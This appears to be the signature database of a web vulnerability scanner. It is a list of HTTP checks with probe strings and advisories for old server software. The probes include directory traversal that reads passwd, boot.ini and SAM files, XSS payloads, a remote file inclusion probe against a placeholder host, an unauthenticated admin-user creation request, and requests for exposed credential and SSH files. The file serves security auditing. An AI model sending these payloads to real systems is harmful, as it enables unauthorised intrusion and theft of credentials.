servercat,abyss,abyss
servercat,alchemyeye,Alchemy Eye
servercat,apache,apache
servercat,apache,jakarta
servercat,apache,tomcat
servercat,cern,cern
servercat,citrix,citrix
servercat,compaq,CompaqHTTPServer
servercat,dwhttpd,dwhttpd
servercat,goaheadwebs,GoAhead-Webs
servercat,icecast,icecast
servercat,iis,iis
servercat,iis,personal web
servercat,iis,pws
servercat,jrun,jrun
servercat,lotus,domino
servercat,lotus,lotus
servercat,mipcd,mofet
servercat,mycio,mycio
servercat,mywebserver,mywebserver
servercat,ncsa,ncsa
servercat,netscape,iplanet
servercat,netscape,netscape
servercat,novell,netware
servercat,novell,novell
servercat,omnihttpd,OmniHTTPd
servercat,oracle,oracle
servercat,sambar,Sambar
servercat,savant,Savant
servercat,simpleserver,SimpleServer
servercat,tivoli,ADSM_HTTP
servercat,w4,w4
servercat,weblogic,weblogic
servercat,webserver4d,Web_Server_4D
servercat,website,website
########################################################################
# Checks: c,ws type,root,method,file,result,information,data to send
########################################################################
# <script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET
# Cross Site Scripting (XSS). CA-2000-02."
#c,generic,@CGIDIRS,,"Directory Listing",GET,"Directory indexing of CGI directory should be disabled."
#c,lotus,/,"%00.nsf/../lotus/domino/notes.ini",200,GET,"The server allows the notes.ini file to be retrieved."

c,generic,/phpshare/,phpshare.php,200,GET,"Several serious security holes pre 0.6b2. Several minor security holes pre 0.6b3"
c,generic,/w-agora,/,200,GET,"w-agora pre 4.1.4 may allow a remote user to execute arbitrary PHP scripts via URL includes in include/*.php and user/*.php files. Default account is 'admin' but password set during install."
c,generic,/,jamdb/,200,GET,"JamDB pre 0.9.2 mp3.php and image.php can allow user to read arbitrary file out of docroot."
c,generic,/,krysalis/,200,GET,"Krysalis pre 1.0.3 may allow remote users to read arbitrary files outside docroot"
c,generic,/,a?<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"Server is vulnerable to Cross Site Scripting (XSS) in the error message if code is passed in the query-string. This may be a Null HTTPd server."
c,abyss,/,%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini,"[fonts]",GET,"Abyss allows directory traversal if %5c is in a URL. Upgrade to the latest version."
c,abyss,/,%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini,"[windows]",GET,"Abyss allows directory traversal if %5c is in a URL. Upgrade to the latest version."
c,abyss,/,////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////,"index of",GET,"Abyss 1.03 reveals directory listing when 256 /'s are requested."
c,abyss,/,conspass.chl+,200,GET,"Abyss allows hidden/protected files to be served if a + is added to the request."
c,abyss,/,consport.chl+,200,GET,"Abyss allows hidden/protected files to be served if a + is added to the request."
c,abyss,/,general.chl+,200,GET,"Abyss allows hidden/protected files to be served if a + is added to the request."
c,abyss,/,srvstatus.chl+,200,GET,"Abyss allows hidden/protected files to be served if a + is added to the request."
c,alchemyeye,@CGIDIRS,../../../../../../../../../../WINNT/system32/ipconfig.exe,"IP Configuration",GET,"Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands."
c,alchemyeye,@CGIDIRS,NUL/../../../../../../../../../WINNT/system32/ipconfig.exe,"IP Configuration",GET,"Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands."
c,alchemyeye,@CGIDIRS,PRN/../../../../../../../../../WINNT/system32/ipconfig.exe,"IP Configuration",GET,"Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands."
c,apache,/,"?D=A","index of \/",GET,"Apache allows directory listings by requesting. Upgrade Apache or disable directory indexing."
c,apache,/,"?M=A","index of \/",GET,"Apache allows directory listings by requesting. Upgrade Apache or disable directory indexing."
c,apache,/,"?N=D","index of \/",GET,"Apache allows directory listings by requesting. Upgrade Apache or disable directory indexing."
c,apache,/,"?S=A","index of \/",GET,"Apache allows directory listings by requesting. Upgrade Apache or disable directory indexing."
c,apache,/,.DS_Store,"Bud1",GET,"Apache on Mac OSX will serve the .DS_Store file, which contains sensitive information. Configure Apache to ignore this file or upgrade to a newer version."
c,apache,/,.FBCIndex,"Bud2",GET,"This file son OSX contains the source of the files in the directory. http://www.securiteam.com/securitynews/5LP0O005FS.html"
c,apache,/,/,"not found for:",OPTIONS,"By sending an OPTIONS request for /, the physical path to PHP can be revealed."
c,apache,/,666%0a%0a<script>alert('Vulnerable');</script>666.jsp,"<script>alert('Vulnerable');</script>",GET,"Apache Tomcat 4.1 / Linux is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,apache,/,admin.cgi,"Administration",GET,"InterScan VirusWall administration is accessible without authentication."
c,apache,/,blah-whatever.jsp,"JSP file \"",GET,"The Apache Tomcat 3.1 server reveals the web root path when requesting a non-existent JSP file. CAN-2000-0759."
c,apache,/,docs/,200,GET,"May give list of installed software"
c,apache,/,index.html.ca,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.cz.iso8859-2,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.de,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.dk,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.ee,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.el,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.en,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.es,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.et,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.fr,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.he.iso8859-8,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.hr.iso8859-2,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.it,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.ja.iso2022-jp,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.kr.iso2022-kr,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.ltz.utf8,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.lu.utf8,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.nl,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.nn,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.no,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.po.iso8859-2,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.pt,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.pt-br,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.ru.cp-1251,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.ru.cp866,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.ru.iso-ru,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.ru.koi8-r,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.ru.utf8,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.se,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.tw,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.tw.Big5,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.var,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,lpt9,"FileNotFoundException:",GET,"Apache Tomcat 4.0.3 reveals the web root when requesting a non-existent DOS device. Upgrade to version 4.1.3beta or higher."
c,apache,/,server-info,200,GET,"This gives a lot of Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts."
c,apache,/,server-status,200,GET,"This gives a lot of Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts."
c,apache,/,stronghold-info,200,GET,"Redhat Stronghold from versions 2.3 up to 3.0 disclose sensitive information. This gives information on configuration. CAN-2001-0868."
c,apache,/,stronghold-status,200,GET,"Redhat Stronghold from versions 2.3 up to 3.0 disclose sensitive information. CAN-2001-0868."
c,apache,/,test,"test hierarchy",GET,"Apache Tomcat default file found. All default files should be removed."
c,apache,/,test.php,"Current PHP version",GET,"PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information."
c,apache,/cgi-bin/,main_menu.pl,"NetDetector Traffic Analysis",GET,"The NetDetector allows unauthenticated users to perform database queries."
c,apache,/cgi-bin/,printenv,"DOCUMENT_ROOT",GET,"Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed."
c,apache,/cgi-bin/,printenv,"Premature end of script headers: /",GET,"Apache 2.0 printenv default script does not have execute permissions but leaks file system paths."
c,apache,/cgi-bin/,search,"=sourcedir",GET,"Apache Stronghold 3.0 may reveal the web root in the source of this CGI ('sourcedir' value)."
c,apache,/cgi-bin/,test-cgi,"PATH_TRANSLATED",GET,"Apache 2.0 default script is executable and reveals system information. All default scripts should be removed."
c,apache,/cgi-bin/,test-cgi,"Premature end of script headers: /",GET,"Apache 2.0 printenv default script does not have execute permissions but leaks file system paths."
c,apache,/content/base/build/explorer/,"none.php?..:..:..:..:..:..:..:etc:passwd:","root:",GET,"SunPS iRunbook Version 2.5.2 allows files to be read remotely."
c,apache,/content/base/build/explorer/,none.php?/etc/passwd,"root:",GET,"SunPS iRunbook Version 2.5.2 allows files to be read remotely."
c,apache,/docs/sdb/en/html/,index.html,"Support Database",GET,"This may be a default SuSe Apache install. This is the support page."
c,apache,/error/,"%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini","[windows]",GET,"Apache allows files to be retrieved outside of the web root. Apache should be upgraded to 2.0.40 or above. CAN-2002-0661."
c,apache,/error/,"%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini","[fonts]",GET,"Apache allows files to be retrieved outside of the web root. Apache should be upgraded to 2.0.40 or above. CAN-2002-0661."
c,apache,/error/,HTTP_NOT_FOUND.html.var,"Available variants",GET,"Apache reveals file system paths when invalid error documents are requested."
c,apache,/examples,/,"Directory Listing",GET,"Directory indexing enabled, also default JSP examples."
c,apache,/examples/jsp/,index.html,"JSP Samples",GET,"Apache Tomcat default JSP pages present."
c,apache,/examples/jsp/,source.jsp??,"Directory Listing",GET,"Tomcat 3.23/3.24 allows directory listings by performing a malformed request to a default jsp. Default pages should be removed."
c,apache,/examples/jsp/snp/,snoop.jsp,"Request Information",GET,"Displays information about page retrievals, including other users."
c,apache,/examples/servlet/,TroubleShooter,"TroubleShooter Servlet Output",GET,"Tomcat default jsp page reveals system information and may be vulnerable to XSS."
c,apache,/examples/servlets/,index.html,"Servlet Examples",GET,"Apache Tomcat default JSP pages present."
c,apache,/icons,/,200,GET,"Directory indexing is enabled, it should only be enabled for specific directories (if required). If indexing is not used all, the /icons directory should be removed."
c,apache,/interscan,/,"Administration",GET,"InterScan VirusWall administration is accessible without authentication."
c,apache,/jservdocs,/,200,GET,"Default Apache JServ docs should be removed."
c,apache,/manual/images,/,200,GET,"Apache 2.0 directory indexing is enabled, it should only be enabled for specific directories (if required). Apache's manual shouuld be removed and directory indexing disabled."
c,apache,/NetDetector/,middle_help_intro.htm,"NIKSUN-HELP",GET,"The system appears to be a Niksun NetDetector (network monitoring). ĘThe help files should be available at /NetDetector/quick_help_index.html"
c,apache,/php/,php.exe?c:\boot.ini,"boot loader",GET,"The Apache config allows php.exe to be called directly." 
c,apache,/pls/,admin,"ENVIRONMENT",GET,"Oracle Apache+WebDB gives a lot of system information via the pls/admin script"
c,apache,/servlet/org.apache.catalina.ContainerServlet/,<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02."
c,apache,/servlet/org.apache.catalina.Context/,<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02."
c,apache,/servlet/org.apache.catalina.Globals/,<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02."
c,apache,/servlet/org.apache.catalina.servlets.WebdavStatus/,<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02."
c,apache,/servlets/,MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"The NetDetector install is vulnerable to Cross Site Scripting (XSS) in it's invalid login message. CA-2000-02."
c,apache,/site/eg/,source.asp,200,GET,"This asp (installed with Apache::ASP) allows attackers to upload files to the server. Upgrade to 1.95 or higher. CAN-2000-0628."
c,apache,/soap/servlet/,soaprouter,200,GET,"Oracle 9iAS SOAP components allow anonymous users to deploy applications by default."
c,apache,/test/,realPath.jsp,"WEBROOT",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
c,apache,/test/jsp/,buffer1.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
c,apache,/test/jsp/,buffer2.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
c,apache,/test/jsp/,buffer3.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
c,apache,/test/jsp/,buffer4.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
c,apache,/test/jsp/,extends1.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
c,apache,/test/jsp/,extends2.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
c,apache,/test/jsp/,Language.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
c,apache,/test/jsp/,pageAutoFlush.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
c,apache,/test/jsp/,pageDouble.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
c,apache,/test/jsp/,pageExtends.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
c,apache,/test/jsp/,pageImport2.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
c,apache,/test/jsp/,pageInfo.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
c,apache,/test/jsp/,pageInvalid.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
c,apache,/test/jsp/,pageIsErrorPage.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
c,apache,/test/jsp/,pageIsThreadSafe.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
c,apache,/test/jsp/,pageSession.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
c,apache,/test/jsp/declaration/,IntegerOverflow.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
c,apache,/tomcat-docs/,index.html,200,GET,"Default Apache Tomcat documentation found."
c,apache,/~nobody/,etc/passwd,"root:",GET,"Apache is misconfigured to view files by accessing ~nobody/filename. Change UserDir from './' to something else in httpd.conf."
c,apache,@CGIDIRS,.htaccess,200,GET,"Contains authorization information"
c,apache,@CGIDIRS,test-cgi.bat,200,GET,"This is an Apache for Win default. If Apache is lower than 1.3.23, this can be exploited as in test-cgi.bat?|dir+c:+>..\htdocs\listing.txt, but may not allow data sent back to the browser."
c,cern,/,.wwwacl,200,GET,"Contains authorization information"
c,cern,/,.www_acl,200,GET,"Contains authorization information"
c,cern,@CGIDIRS,.wwwacl,200,GET,"Contains authorization information"
c,cern,@CGIDIRS,.www_acl,200,GET,"Contains authorization information"
c,cern,@CGIDIRS,ls," neither '/",GET,"The CERN server lets attackers view the host's path. Should be upgraded to Apache, as CERN is not maintained."
c,citrix,/,applist.asp,200,GET,"Citrix server may allow remote users to view applications installed without authenticating."
c,citrix,/,boilerplate.asp?NFuse_Template=.../.../.../.../.../.../.../.../.../boot.ini&NFuse_CurrentFolder=/,"boot loader",GET,"Citrix CGI allows directory traversal."
c,compaq,"http://","127.0.0.1:2301/ HTTP/1.0","Compaq WBEM Device",GET,"The Compaq WBEM interface can act as an HTTP proxy, which can allow firewall or web proxy bypass. http://www.compaq.com/products/servers/management/SSRT0758.html"
c,compaq,/Survey/,Survey.Htm,"System Components",GET,"This Compaq device, without authentication, gives lots of system information."
c,compaq,/WEBAGENT/,CQMGSERV/CF-SINFO.TPF,"General Information",GET,"This Compaq device, without authentication, gives lots of system information. Load all the pages at /WEBAGENT/FINDEX.TPL"
c,dwhttpd,/ab2/,@AdminAddadmin?uid=foo&password=bar&re_password=bar,200,GET,"Sun Answerbook may allow users to be created without proper authentication first. Attempted to add user 'foo' with password 'bar'."
c,dwhttpd,/ab2/,@AdminViewError,200,GET,"Sun Answerbook allows viewing of the error logs without authentication."
c,generic,/%3cscript%3ealert(%22xss%22)%3c/script%3e/,index.html,"<script>alert('Vulnerable')</script>",GET,"Server allows Cross Site Scripting (XSS) in 404 error messages if the code is in a directory. This may be Falcon web server."
c,generic,/,"%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini","[windows]",GET,"Attackers can read any file on the system. Upgrade to Analogx 1.07 or higher."
c,generic,/,"..%252f..%252f..%252f..%252f..%252f../windows/repair/sam",200,GET,"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information."
c,generic,/,"..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam",200,GET,"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information."
c,generic,/,"..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._",200,GET,"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information."
c,generic,/,"..%255c..%255c..%255c..%255c..%255c../windows/repair/sam",200,GET,"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information."
c,generic,/,"..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam",200,GET,"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information."
c,generic,/,"..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._",200,GET,"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information."
c,generic,/,"..%2F..%2F..%2F..%2F..%2F../windows/repair/sam",200,GET,"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information."
c,generic,/,"..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam",200,GET,"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information."
c,generic,/,"..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._",200,GET,"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information."
c,generic,/,"<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>",GET,"Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,"<script>alert('Vulnerable')</script>.jsp","<script>alert('Vulnerable')</script>.jsp",GET,"Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,"<script>alert('Vulnerable')</script>.shtml","<script>alert('Vulnerable')</script>.shtml",GET,"Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,"<script>alert('Vulnerable')</script>.thtml","<script>alert('Vulnerable')</script>.thtml",GET,"Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,"bb000001.pl<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>",GET,"Actinic E-Commerce services is vulnerable to to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,"ca000001.pl?ACTION=SHOWCART&hop=\"><script>alert('Vulnerable')</script>&PATH=acatalog%2f","<script>alert('Vulnerable')</script>",GET,"Actinic E-Commerce services is vulnerable to to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,"ca000007.pl?ACTION=SHOWCART&REFPAGE=\"><script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>",GET,"Actinic E-Commerce services is vulnerable to to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,"comments.php?subject=<script>alert('Vulnerable')</script>&comment=<script>alert('Vulnerable')</script>&pid=0&sid=0&mode=&order=&thold=op=Preview",<script>alert('Vulnerable')</script>,GET,"This version of PHP-Nuke's comments.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02."
c,generic,/,"ss000007.pl?PRODREF=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>",GET,"Actinic E-Commerce services is vulnerable to to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,"[SecCheck]/..%252f..%252f../ext.ini",200,GET,"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information."
c,generic,/,"[SecCheck]/..%255c..%255c../ext.ini",200,GET,"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information."
c,generic,/,"[SecCheck]/..%2f../ext.ini",200,GET,"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information."
c,generic,/,%00/,"Directory listing of",GET,"Remote directories can be retrieved, (this may be a Roxen server), upgrade the server."
c,generic,/,%22%3cscript%3ealert(%22xss%22)%3c/script%3e,"<script>alert('Vulnerable')</script>",GET,"Server allows Cross Site Scripting (XSS) in 301 error messages. This may be Falcon web server."
c,generic,/,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd,"root:",GET,"Web server allows reading of files by sending encoded '../' requests. This server may be Boa (boa.org)."
c,generic,/,%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e,"<script>alert('Vulnerable')</script>",GET,"Server allows Cross Site Scripting (XSS) in 301 error messages. This may be Falcon web server."
c,generic,/,%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e,"<script>alert('Vulnerable')</script>",GET,"Server allows Cross Site Scripting (XSS) in 301 error messages. This may be Falcon web server."
c,generic,/,%3f.jsp,"Directory Listing",GET,"JRun 3.0 and 3.1 on NT/2000 running IIS4 or IIS5 allow directory listing by requesting %3f.jsp at the end of a URL."
c,generic,/,%3f.jsp,"Index of",GET,"JRun 3.0 and 3.1 on NT/2000 running IIS4 or IIS5 allow directory listing by requesting %3f.jsp at the end of a URL."
c,generic,/,................../etc/passwd,"root:",GET,"The web server allows the password file to be retrieved."
c,generic,/,.../.../.../.../.../.../.../.../.../boot.ini,"boot loader",GET,"Software allows files to be retrieved outside of the web root by using 'triple dot' notation. May be MiniPortal?"
c,generic,/,../../../../../../../../../../etc/passwd,"root:",GET,"It is possible to read files on the server by adding ../ in front of file name."
c,generic,/,..\..\..\..\..\..\temp\temp.class,200,GET,"Cisco ACS 2.6.x and 3.0.1 (build 40) allows authenticated remote users to retrieve any file from the system. Upgrade to the latest version."
c,generic,/,./,"include\(\"",GET,"Appending '/./' to a directory may reveal php source code."
c,generic,/,.access,200,GET,"Contains authorization information"
c,generic,/,.addressbook,200,GET,"PINE addressbook, may store sensitive e-mail address contact information and notes"
c,generic,/,.bashrc,200,GET,"User home dir was found with a shell rc file. This may reveal file and path information."
c,generic,/,.bash_history,200,GET,"A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web."
c,generic,/,.cobalt/sysManage/../admin/.htaccess,"AuthName",GET,"Cobalt RaQ 4 server manager allows any files to be retrieved by using the path through the .cobalt directory."
c,generic,/,.forward,200,GET,"User home dir was found with a mail forward file. May reveal where the user's mail is being forwarded to."
c,generic,/,.history,200,GET,"A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web."
c,generic,/,.htaccess,200,GET,"Contains authorization information"
c,generic,/,.htpasswd,200,GET,"Contains authorization information"
c,generic,/,.lynx_cookies,200,GET,"User home dir found with LYNX cookie file. May reveal cookies received from arbitrary web sites."
c,generic,/,.passwd,200,GET,"Contains authorization information"
c,generic,/,.pinerc,200,GET,"User home dir found with a PINE rc file. May reveal system information, directories and more."
c,generic,/,.plan,200,GET,"User home dir with a .plan, a now mostly outdated file for delivering information via the finger protocol "
c,generic,/,.proclog,200,GET,"User home dir with a Procmail log file. May reveal user mail traffic, directories and more."
c,generic,/,.procmailrc,200,GET,"User home dir with a Procmail rc file. May reveal sub directories, mail contacts and more."
c,generic,/,.profile,200,GET,"User home dir with a shell profile was found. May reveal directory information and system configuration."
c,generic,/,.rhosts,200,GET,"A user's home directory may be set to the web root, a .rhosts file was retrieved. This should not be accessible via the web."
c,generic,/,.sh_history,200,GET,"A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web."
c,generic,/,.ssh,200,GET,"A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web."
c,generic,/,.ssh/authorized_keys,200,GET,"A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web."
c,generic,/,.ssh/known_hosts,200,GET,"A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web."
c,generic,/,/errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/,"http://xxxxxxxx/errors/configure_instructions",GET,"Gallery 1.3.0 and below allow PHP files to be included from another domain. Upgrade to the latest version."
c,generic,/,/etc/passwd,"root:",GET,"The server install allows reading of any system file by adding an extra '/' to the URL."
c,generic,/,/profile.php?u=JUNK(8),"Warning:",GET,"Powerboards (http://powerboards.sourceforge.net/) is vulnerable to path disclosure. See http://www.ifrance.com/kitetoua/tuto/powerboards.txt for details."
c,generic,/,<script>alert('Vulnerable')</script>.aspx,"<script>alert('Vulnerable')</script>",GET,"Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). CA-2000-02."
c,generic,/,?sql_debug=1,"SQL query: ",GET,"The PHP-Nuke install may allow attackers to enable debug mode and disclose sensitive information by adding sql_debug=1 to the query string."
c,generic,/,a%5c.aspx,"Invalid file name for monitoring:",GET,"Older Microsoft .NET installations allow full path disclosure."
c,generic,/,a/,200,GET,"May be Kebi Web Mail administration menu."
c,generic,/,access-log,200,GET,"Just found this log file..."
c,generic,/,access.log,200,GET,"Just found this log file..."
c,generic,/,access/,200,GET,"This might be interesting..."
c,generic,/,account/,200,GET,"This might be interesting..."
c,generic,/,accounting/,200,GET,"This might be interesting..."
c,generic,/,active.log,"WEBactive Http Server",GET,"The WebActive log is accessible remotely."
c,generic,/,add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"AdManager 1.1 http://www.sugarfreenet.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 
c,generic,/,add_user.php,"output started at /",GET,"DCP-Portal reveals system path. Upgrade to a version higher than 4.2. This version is also vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,admin.htm,200,GET,"This might be interesting..."
c,generic,/,admin.html,200,GET,"This might be interesting..."
c,generic,/,admin.php,200,GET,"This might be interesting..."
c,generic,/,admin.php3,200,GET,"This might be interesting..."
c,generic,/,admin.php4?reg_login=1,200,GET,"Mon Album from http://www.3dsrc.com version 0.6.2d allows remote admin access. This should be protected."
c,generic,/,admin.php?en_log_id=0&action=config,200,GET,"EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This php file should be protected."
c,generic,/,admin.php?en_log_id=0&action=users,200,GET,"EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This php file should be protected."
c,generic,/,admin.shtml,200,GET,"This might be interesting..."
c,generic,/,admin/,200,GET,"This might be interesting..."
c,generic,/,admin/contextAdmin/contextAdmin.html,200,GET,"Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin."
c,generic,/,Administration/,200,GET,"This might be interesting..."
c,generic,/,administration/,200,GET,"This might be interesting..."
c,generic,/,administrator/,200,GET,"This might be interesting..."
